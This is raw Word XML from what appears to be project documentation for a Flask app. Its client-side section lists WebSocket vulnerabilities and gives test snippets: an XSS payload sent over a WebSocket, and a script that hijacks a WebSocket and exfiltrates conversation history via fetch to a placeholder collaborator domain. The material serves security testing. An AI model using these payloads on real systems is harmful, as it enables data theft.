    <w:p w:rsidR="006F5C48" w:rsidRPr="006F5C48" w:rsidRDefault="00A02D7E" w:rsidP="006F5C48">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1041" alt="" style="width:468pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901FA2" w:rsidRDefault="00901FA2" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc166500830"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_app</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="00A35931" w:rsidRDefault="00A35931" w:rsidP="00A35931">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> related to web application version of BBA project and use flask.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35931" w:rsidRDefault="00A35931" w:rsidP="00A35931">
      <w:r>
        <w:t>It has two parts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35931" w:rsidRDefault="00A35931" w:rsidP="00A35931">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35931" w:rsidRDefault="00A35931" w:rsidP="00A35931">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35931" w:rsidRDefault="00A35931" w:rsidP="00A35931"/>
    <w:p w:rsidR="00A35931" w:rsidRDefault="0058129B" w:rsidP="00A35931">
      <w:r>
        <w:t>for run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0058129B" w:rsidRDefault="0058129B" w:rsidP="00A35931">
      <w:r>
        <w:t>python3 BBA_app.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0058129B" w:rsidRDefault="00000000" w:rsidP="00A35931">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="0058129B" w:rsidRPr="004641BB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5000</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0058129B" w:rsidRDefault="0058129B" w:rsidP="00A35931"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRPr="006F5C48" w:rsidRDefault="00A02D7E" w:rsidP="006F5C48">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1040" alt="" style="width:468pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901FA2" w:rsidRDefault="00901FA2" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc166500831"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_authentication</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRPr="006F5C48" w:rsidRDefault="00A02D7E" w:rsidP="006F5C48">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1039" alt="" style="width:468pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901FA2" w:rsidRDefault="00901FA2" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc166500832"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_authorization</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRPr="006F5C48" w:rsidRDefault="00A02D7E" w:rsidP="006F5C48">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1038" alt="" style="width:468pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901FA2" w:rsidRDefault="00901FA2" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc166500833"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_businessL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRPr="006F5C48" w:rsidRDefault="00A02D7E" w:rsidP="006F5C48">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1037" alt="" style="width:468pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901FA2" w:rsidRDefault="00901FA2" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc166500834"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_Client_side</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="00625BEE" w:rsidP="006F5C48">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Websocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="006F5C48"/>
    <w:p w:rsidR="00625BEE" w:rsidRPr="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:r w:rsidRPr="00625BEE">
        <w:t>some common WebSocket vulnerabilities and how they can be exploited:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRPr="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00625BEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Manipulating WebSocket Messages Due to Lack of Input-Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00625BEE">
        <w:t xml:space="preserve">: This occurs when an attacker can alter WebSocket communications and the server does not correctly validate and sanitize the input. An attacker can send specifically designed payloads as a message by using a proxy tool like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00625BEE">
        <w:t>BurpSuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00625BEE">
        <w:t>. Here is an example of how to test for this vulnerability using Python:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">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import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>websocket,json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>websocket.WebSocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ws.connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>://10.0.0.1/")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>d = {"message": "&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/script&gt;"}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
      </w:pPr>
      <w:r>
        <w:t>data = str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(d))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ws.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(data)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">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result = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ws.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
      </w:pPr>
      <w:r>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>json.loads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(result))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRPr="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE"/>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00625BEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authentication and Authorization Risks</w:t>
      </w:r>
      <w:r w:rsidRPr="00625BEE">
        <w:t xml:space="preserve">: There is no native authentication method for the WebSocket protocol. Also, there is no system for handling authorizations. If for example, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00625BEE">
        <w:t>websocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00625BEE">
        <w:t xml:space="preserve"> server sends back the history of the conversation of a user if a msg with "READY" is sent, then a simple XSS establishing the connection sending "READY" will be able to retrieve the history of the conversation. Here is an example of how to test for this vulnerability using JavaScript:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRPr="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE"/>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>websocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = new WebSocket('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>://your-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>websocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-URL')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>websocket.onopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>websocket.onmessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>handleReply</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
      </w:pPr>
      <w:r>
        <w:t>function start(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>websocket.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">("READY"); //Send the message to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>retreive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> confidential information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">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function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>handleReply</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">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//Exfiltrate the confidential information to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>attackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>fetch(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'https://your-collaborator-domain/?'+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>event.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, {mode: 'no-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'})</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRPr="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE"/>
    <w:p w:rsidR="00625BEE" w:rsidRPr="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00625BEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross Origin + Cookie with a different subdomain</w:t>
      </w:r>
      <w:r w:rsidRPr="00625BEE">
        <w:t>: WebSocket connections are usually initiated via client-side JavaScript. During the connection establishment, a handshake is performed between the browser and server over HTTP. If the WebSocket server does not properly validate the </w:t>
      </w:r>
      <w:r w:rsidRPr="00625BEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Origin</w:t>
      </w:r>
      <w:r w:rsidRPr="00625BEE">
        <w:t> header, an attacker can connect to the WebSocket server from a different domain. Here is an example of how to test for this vulnerability using Python:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B774A" w:rsidRDefault="003B774A" w:rsidP="003B774A">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1998"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>websocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003B774A" w:rsidRDefault="003B774A" w:rsidP="003B774A">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1998"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B774A" w:rsidRDefault="003B774A" w:rsidP="003B774A">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1998"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>websocket.WebSocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B774A" w:rsidRDefault="003B774A" w:rsidP="003B774A">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1998"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ws.connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>://10.0.0.1/")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B774A" w:rsidRDefault="003B774A" w:rsidP="003B774A">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1998"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ws.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("Hello, World!")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B774A" w:rsidRDefault="003B774A" w:rsidP="003B774A">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1998"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">result = </w:t>
      </w:r>
